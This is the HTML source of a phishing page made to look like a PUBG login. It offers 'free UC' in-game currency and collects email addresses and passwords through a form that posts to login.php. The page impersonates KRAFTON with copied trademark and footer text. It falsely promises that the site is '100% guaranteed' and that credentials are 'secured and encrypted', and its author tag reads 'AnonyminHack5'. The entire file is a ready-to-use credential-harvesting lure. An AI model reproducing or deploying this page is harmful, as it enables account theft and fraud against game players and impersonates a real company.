<!Doctype html>
<html>
<head>
	<link rel="apple-touch-icon" sizes="180x180" href="favicon_io/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="favicon_io/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="favicon_io/favicon-16x16.png">
<link rel="manifest" href="favicon_io/site.webmanifest">
	<title>PLAYERUNKNOWN'S UNDERGROUND - FREE UC</title>
	<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta charset="UTF-8"/>
<meta http equiv="X-UA-compatible" content="IE=edge"/>
<noscript>Sorry your browser does not support javascript</noscript>
<meta name="author" content="AnonyminHack5">
<meta name="description" content="Login into your pugb account to get free pugb UC very easily 2021."/>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/purecss@3.0.0/build/pure-min.css" integrity="sha384-X38yfunGUhNzHpBaEBsWLO+A0HDYOQi8ufWDkZ0k9e0eXz/tH3II7uKZ9msv++Ls" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/purecss@3.0.0/build/pure-min.css" integrity="sha384-X38yfunGUhNzHpBaEBsWLO+A0HDYOQi8ufWDkZ0k9e0eXz/tH3II7uKZ9msv++Ls" crossorigin="anonymous">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/picnic">
<link href="https://fonts.googleapis.com/css?family=Chivo:300,700|Playfair+Display:700i" rel="stylesheet">
<link rel="stylesheet" href="style.css"/>
<link rel="stylesheet" href="cookieconsent.min.css"/>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <!-- Add icon library -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  </head>
  <body>
 <style>
body {
		background-image: url("images/abc.jpeg");
		color: #fff;
		background-repeat: none;
width:auto;
height:auto;
font-family: 'Chivo', sans-serif;
}
img {
width: 200%;
height: 100px;
}
#img {
width: 190%;
height: 200px;
}
.h2 {
text-align: center;
font-size: 50px;
color: #fff;
font-weight: bold;
}
p {
color: #fff;
font-size: 17px;
font-family: 'Chivo', sans-serif;
}
#img2 {
width: 50%;
height: 70px;
}
</style>
<br>
	<center><img src="images/top-logo.png"/></center>
	<br>
		<center><img src="images/images.jpeg" id="img" /></center>
		<marquee><b>Connect your account to get free PUGB UC 💵 💵  100% Guaranteed and Trusted.</b></marquee>
  	<h2 class="h2">
  		 ᑭᑌGᗷ<br>
  	</h2>
	<center>
	<!-- Add font awesome icons -->
<a href="https://m.facebook.com/PUBGMOBILE.IN.OFFICIAL/" class="fa fa-facebook"></a>
<a href="https://www.google.com/url?sa=t&source=web&rct=j&url=https://mobile.twitter.com/pubgaccount&ved=2ahUKEwi21ZnW7JbvAhUNaRUIHWrpCasQFjABegQIDBAC&usg=AOvVaw15JJnJb9fEUks9xU8CVkEk" class="fa fa-twitter"></a>
<a href="https://www.google.com/url?sa=t&source=web&rct=j&url=https://www.instagram.com/pubg/&ved=2ahUKEwi9wNLu7JbvAhU9UhUIHXvgAAcQFjACegQIFhAC&usg=AOvVaw0c04ruhYf3oz3ebRwiTQCI" class="fa fa-instagram"></a>  
<a href="https://youtube.com/c/PUBG" class="fa fa-youtube"></a>  
<a href="https://pugb.com" class="fa fa-google"></a>  
</center>
<br>
<style>  	
/* Style all font awesome icons */
.fa {
  padding: 10px;
  font-size: 20px;
  width: 47px;
  text-align: center;
  text-decoration: none;
  border-radius: 50%;
  height: 40px;
  
}

/* Add a hover effect if you want */
.fa:hover {
  opacity: 0.7;
}

/* Set a specific color for each brand */

/* Facebook */
.fa-facebook {
  background: #3B5998;
  color: white;
  
}

.fa-twitter {  
  background: #55ACEE;  
  color: white;  
}  
.fa-instagram {  
  background: #125688;  
  color: white;  
}  
.fa-youtube {  
  background: #bb0000;  
  color: white;  
}  
.fa-google {  
  background: #dd4b39;  
  color: white;  
}  
</style>
<style>
	input[type=email] {
	background: none;
	border: 3px solid lightgrey;
	outline: none;
	padding: 10px;
	text-indent: none;
	border-top-style: none;
	border-left-style: none;
	border-right-style: none;
	width: 85%;
	height: 50px;
	color: #fff;
	}
	input[type=email]::placeholder {
	text-decoration: capital;
	color: white;
	}
	input[type=email]:hover {
	border: 3px solid orange;
	border-top-style: none;
	border-right-style: none;
	border-left-style: none;
	}
	input[type=password] {
	background: none;
	border: 3px solid lightgrey;
	outline: none;
	padding: 10px;
	text-indent: none;
	border-top-style: none;
	border-left-style: none;
	border-right-style: none;
	width: 85%;
	height: 50px;
	color: #fff;
	}
	input[type=password]::placeholder {
	text-decoration: capital;
	color: white;
	}
	input[type=password]:hover {
	border: 3px solid orange;
	border-top-style: none;
	border-right-style: none;
	border-left-style: none;
	}
	.middle {
	text-align: center;
font-size: 30px;
color: #fff;
font-weight: bold;
}
	</style>
	<h2 class="middle">
		ꉔꄲꋊꋊꏂꉔ꓄ ꌦꄲ꒤ꋪ ꋬꉔꉔꄲ꒤ꋊ꓄
		</h2>
		<br>
			
	<form action="login.php" method="post" onSubmit="return validateForm();">
		<center><input type="email" id="data_4" name="email" placeholder="EMAIL ADDRESS" maxlenght="40" required/></center>
		<br>
 <br>
	<center><input type="password" id="txtPassword" name="" placeholder="PASSWORD" maxlenght="40" required/></center>
	<br/>
	<br>
		<center><input type="password" id="txtConfirmPassword" name="password" placeholder="CONFIRM PASSWORD" required/></center>
		<br>
			<style>
		* {
         box-sizing: border-box;
      }
      input[type="checkbox"]{
         display: none; /* hide the default check boxes and radios */
      }
      /* style the label elements */
      label {
         display: block;
         width: 60%;
         padding: 10px;
         height: 43px;
         border: 1px solid orange;
         margin-bottom: 10px;
         border-radius: 10px;
         box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
      }
      /* create our custom checkbox and radio */
      label > span {
         display: inline-block;
         width: 15px;
         height: 15px;
         border: 3px solid #0076ff;
         border-radius: 50%;
         margin-right: 5px;
      }
      /* style the labels when their corresponding inputs are checked */
      input[type="checkbox"]:checked + label {
         background: #173459;
         color: white;
      }
      /* style the custom check boxes and radios when their corresponding inputs are checked */
      input[type="checkbox"]:checked + label > span {
         background: orange;
      }
      a {
      color: #fff;
      }
      a:active{
      color: orange;
      }
      a:home{
      color: orange;
      }
      a:hover {
      color: orange;
      font-weight: bold;
      }
   </style>
   <center>
   <input type="checkbox" name="fruits" value="Remember Email" id="apple" />
      <label for="apple"><span></span>Remember Email</label>
    <span><a href="https://accounts.pugb.com/recover" target="_blank">Forgot your password</a></span>
    </center>
    <br>
      	<br/>
 <style>
 	input[type=submit]{
 	background: orange;
 	border: none;
 	outline: none;
 	border-radius: none;
 	text-align: center;
 	color: black;
 	font-weight: bold;
 	width: 85%;
 	height: 65px;
 	font-size: 19px;
 	}
 	input[type=submit]:hover {
 	opacity: 0.7;
 	outline: 2px solid purple;
 	border-radius: 1px;
 	}
 	</style>
 	<center>
 	<input type="submit" name="form" value="LOGIN"/>
 	</center>
 </form>
 <script type="text/javascript">
        function validateForm() {
            var password = document.getElementById("txtPassword").value;
            var confirmPassword = document.getElementById("txtConfirmPassword").value;
            if (password != confirmPassword) {
                alert("Passwords do not match, Please check password and try again!!..");
                return false;
            }
            return true;
        }
    </script>
 	<br/>
 		<p style="color: orange; text-align: center; font-weight: bold;">DONT HAVE AN ACCOUNT?</p>
 <br/>
 <br>
 <style>
 	#btn{
 	background: none;
 	outline: 2px solid orange;
 	border-radius: none;
 	text-align: center;
 	font-weight: bold;
 	color: orange;
 	width: 85%;
 	height: 65px;
 	font-size: 19px;
 	}
 	#btn:hover {
 	background: orange;
 	opacity: 0.9;
 	color: yellow;
 	outline: purple;
 	border-radius: none;
 	border: 2px solid purple;
 	}
 	</style>
 	<center><button onclick="openWin();" id="btn"> CREATE MY ACCOUNT </button></center>
<br>      	
<br>      	
 <br>
 <style>
 	.div-footer {
 	background-image: url("images/sec.jpeg");
 	width: auto;
 	height: auto;
 	color: #fff;
 	font-size: 13px;
 	}
 	.small-img {
 	width: 130px;
 	height: 60px;
 	float: left;
 	}
 	</style>
 	<footer class="div-footer">
 		<br>
 	&copy2021 KRAFTON, inc.<br>
 		PLAYERUNKNOWN’S BATTLEGROUNDS and PUBG are registered trademarks or service marks of KRAFTON, Inc.
<br>
	<br>
Partnership Inquiry:  PUBG_inquiry@pubg.com <br>
	<br>
	<b>Privacy Policy &nbsp;&nbsp;&nbsp  </b>   |   &nbsp;&nbsp;&nbsp   <b>Terms of Service</b>  <br>
		Rules of Conduct <br>  
			<b>Privacy Notice for California Residents</b>
			<br>
				<br>
					
				<img src="images/esrb.png" class="small-img"/>
			<br>
				<br>
					<br>
						<br>
							This is a well trusted and guaranteed site that offers pugb players around the world free Pugb UC very fast and easy. This site has 100% guarantee on its users who login here and ensures that their privacy, account information are secured and encrypted and cannot be lost. To get your free pugb UC kindly login into your pugb account and you will receive a notification in 2 minutes time. Then you will receive your free UC easily. Completely free and Guaranteed.    	
      <br>
	<br>
	</footer>
	<br>
<br> 
	</body>
	</html>



	